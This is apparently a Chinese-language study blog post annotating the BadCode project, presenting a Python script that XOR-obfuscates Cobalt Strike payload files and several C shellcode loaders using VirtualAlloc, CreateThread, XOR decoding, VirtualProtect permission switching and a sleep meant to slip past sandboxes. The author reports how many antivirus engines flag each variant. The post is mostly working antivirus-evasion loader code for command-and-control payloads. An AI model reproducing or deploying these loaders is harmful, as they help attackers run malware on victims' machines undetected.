通讀BadCode

簡介

就是旋哥的BadCode系列，此次好好通讀下，而後我在旋哥的註釋上又加了一些，函數原型等。
項目地址：https://github.com/Rvn0xsy/BadCode

第一課

主要介紹了下cs的raw和c，而後就是混淆
旋哥使用Python作的混淆 xor加密，而後我把功能是幹啥的都寫在了註釋裏，

import sys
from argparse import ArgumentParser, FileType

def process_bin(num, src_fp, dst_fp, dst_raw):
    shellcode = ''
    shellcode_size = 0
    shellcode_raw = b''
    try:
        while True:
            code = src_fp.read(1)                   # 批量讀取原始bin文件的1個字節
            if not code:                            # 若是沒有東西就跳出循環
                break

            base10 = ord(code) ^ num                # 使用code的ASCII碼值 異或 num
            base10_str = chr(base10)                # 而後把異或出來的值再轉換爲char類型
            shellcode_raw += base10_str.encode()    # 將轉換回來的char類型再加密 而後拼接到shellcode_raw裏
            code_hex = hex(base10)                  # 轉換爲16進制
            code_hex = code_hex.replace('0x','')    # 而後把0x替換爲空
            if(len(code_hex) == 1):                 # 若是長度==1
                code_hex = '0' + code_hex           # 好比是1 就變成01
            shellcode += '\\x' + code_hex           # 最後\x01拼接到shellcode裏
            shellcode_size += 1                     # 長度+1個字節
            # 而後while讀取整個文件 1. xor 2. 轉爲char 3. 編碼 4. 轉換
        src_fp.close()                              # 關閉原始的bin文件
        dst_raw.write(shellcode_raw)                # 向新的bin文件寫入
        dst_raw.close()                             # 寫入完而後關閉
        dst_fp.write(shellcode)                     # 向c文件寫入shellcode
        dst_fp.close()                              # 寫入完而後關閉
        return shellcode_size                       # 最後返回shellcode的長度
    except Exception as e:                          # 錯誤處理
        sys.stderr.writelines(str(e))

def main():
    # 如下這些就是設置參數
    # type：參數類型
    # required：是否能夠省略參數
    parser = ArgumentParser(prog='Shellcode X', description='[XOR The Cobaltstrike PAYLOAD.BINs] \t > Author: rvn0xsy@gmail.com')
    parser.add_argument('-v','--version',nargs='?')
    parser.add_argument('-s','--src',help=u'source bin file',type=FileType('rb'), required=True)
    parser.add_argument('-d','--dst',help=u'destination shellcode file',type=FileType('w+'),required=True)
    parser.add_argument('-n','--num',help=u'Confused number',type=int, default=90)
    parser.add_argument('-r','--raw',help=u'output bin file', type=FileType('wb'), required=False)
    args = parser.parse_args()
    shellcode_size = process_bin(args.num, args.src, args.dst, args.raw)
    sys.stdout.writelines("[+]Shellcode Size : {} \n".format(shellcode_size))

if __name__ == "__main__":
    main()

21line 默認是\x，轉義符的問題 \x解決

第二課

申請內存，並建立線程加載shellcode，而後就是xor解密而後加載
這是一個普通的，並無xor

#include <Windows.h>

// 入口函數
int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode長度
    DWORD dwThreadId; // 線程ID
    HANDLE hThread; // 線程句柄
/* length: 800 bytes */

unsigned char buf[] = "";

// 獲取shellcode大小
shellcode_size = sizeof(buf);

/*
函數原型
LPVOID VirtualAlloc(
  LPVOID lpAddress,         // 指向要分配區域的指定起始地址的長指針，若是爲NULL系統自動分配
  DWORD dwSize,             // 指定區域的大小
  DWORD flAllocationType,   // 指定分配類型。
  DWORD flProtect           // 指定訪問保護的類型
);
*/

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,         // shellcode的大小
    MEM_COMMIT,             // 爲指定的頁面區域在內存或磁盤上的頁面文件中分配物理存儲
    PAGE_EXECUTE_READWRITE  // 啓用對頁面提交區域的執行、讀取和寫入訪問。
    );

/*
void CopyMemory(
  _In_  PVOID   Destination,        // 指向複製塊目標起始地址的指針
  _In_  const VOID  *Source,        // 指向要複製的內存塊起始地址的指針。
  _In_  SIZE_T  Length              // 要複製的內存大小
);
*/
    
// 將shellcode複製到可執行的內存頁中
CopyMemory(shellcode,buf,shellcode_size);   // 1. 剛申請的一塊內存(shellcode)   2. 原來的數據的指針   3. 所需大小

/*
HANDLE CreateThread(
  LPSECURITY_ATTRIBUTES   lpThreadAttributes,			// 安全描述符
  SIZE_T                  dwStackSize,					// 堆棧的初始大小，若是爲0系統給一個默認的
  LPTHREAD_START_ROUTINE  lpStartAddress,				// 指向要由線程執行的應用程序定義函數的指針
  __drv_aliasesMem LPVOID lpParameter,					// 指向要傳遞給線程的變量的指針
  DWORD                   dwCreationFlags,				// 建立線程的標誌
  LPDWORD                 lpThreadId					// 線程ID
);
*/

// 建立線程
hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 棧的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函數
    NULL, // 參數
    NULL, // 線程標誌
    &dwThreadId // 線程ID
    );

/*
DWORD WaitForSingleObject(
  HANDLE hHandle,				// HANDLE
  DWORD  dwMilliseconds			// 若是指定了非零值，則函數會等待，直到對象發出信號或間隔結束。若是dwMilliseconds爲零，若是對象沒有發出信號，函數不會進入等待狀態；它老是當即返回。
  若是dwMilliseconds是INFINITE，則該函數將僅在對象收到信號時返回。
);
*/

// 等待線程
WaitForSingleObject(hThread,INFINITE); // 一直等待線程執行結束, INFINITE是一個宏
    return 0;
}

利用xor解密

這裏shellcode[i]每個與0x10再異或，得出原始的shellcode，再進行加載

#include <Windows.h>
#include <stdio.h>

int main()
{
	unsigned char buf[] = "";
	int length = sizeof(buf) / sizeof(buf[0]);
	for (int i = 0; i<length - 1; i++)
	{
		buf[i] ^= 0x10;
	}
	for (int i = 0; i < sizeof(buf)/sizeof(buf[0]); i++)
	{
		printf("\\x%x", buf[i]);
	}
}

本身寫的一個xor的加密代碼 0x10就是key

第三課

主要是利用VirtualProtect函數改變VirtualAlloc申請地址的屬性

#include <Windows.h>

int wmain(int argc,TCHAR * argv[]){

    int shellcode_size = 0; // shellcode長度
    DWORD dwThreadId; // 線程ID
    HANDLE hThread; // 線程句柄
    DWORD dwOldProtect; // 內存頁屬性

unsigned char buf[] = "";


// 獲取shellcode大小
shellcode_size = sizeof(buf);

/* 增長異或代碼 */
for(int i = 0;i<shellcode_size; i++){
    buf[i] ^= 10;
}

char * shellcode = (char *)VirtualAlloc(
    NULL,
    shellcode_size,
    MEM_COMMIT,
    PAGE_READWRITE // 啓用對頁面提交區域的讀寫訪問。再也不是可讀可寫可執行
    );

    // 將shellcode複製到可讀可寫的內存頁中
CopyMemory(shellcode,buf,shellcode_size);

/*
函數原型
BOOL VirtualProtect(
  LPVOID lpAddress,             // 要更改訪問保護屬性的頁面區域的起始頁面地址。 咱們要修改shellcode的屬性，就是shellcode
  SIZE_T dwSize,                // 大小
  DWORD  flNewProtect,          // 內存保護選項
  PDWORD lpflOldProtect         // 指向一個變量的指針，該變量接收指定頁面區域中第一頁的先前訪問保護值；也就是某個地址
);
*/

// 這裏開始更改它的屬性爲可執行
VirtualProtect(shellcode,shellcode_size,PAGE_EXECUTE,&dwOldProtect);    // 1. 被更改的 2. 大小 3. 啓用對頁面提交區域的執行訪問(原來只是可讀可寫) 4. 原來的屬性

// 等待幾秒，興許能夠跳過某些沙盒呢？
Sleep(2000);

hThread = CreateThread(
    NULL, // 安全描述符
    NULL, // 棧的大小
    (LPTHREAD_START_ROUTINE)shellcode, // 函數
    NULL, // 參數
    NULL, // 線程標誌
    &dwThreadId // 線程ID
    );

WaitForSingleObject(hThread,INFINITE); // 一直等待線程執行結束
    return 0;
}

其實這裏修改的地方只有

1. 申請的時候，光申請了可讀可寫，可是並不能執行
2. 利用VirtualProtect函數修改shellcode的屬性，並變成了可執行

報了六個的是普通的申請可讀可寫可執行權限的xor解密執行，報了四個的是先申請可讀可寫，後又修改屬性變成可執行的程序

而後再在上面的代碼的基礎上，不使用手動異或來進行操做，使用自帶函數
在測這個的時候，我還覺得不上線呢，最後發現是sleep的問題 得等段時間了 而後我作了下輸出、

InterlockedXor8這個函數是對char值作異或，(可是我以爲作正常手動異或，應該沒事吧)

LONG InterlockedXor(
  LONG volatile *Destination,		// 指向第一個操做數的指針。該值將替換爲操做的結果。 因此要+i，向後走 一個個異或替換
  LONG          Value
);

最後測試也是4個報毒，看來我以前的猜想沒有錯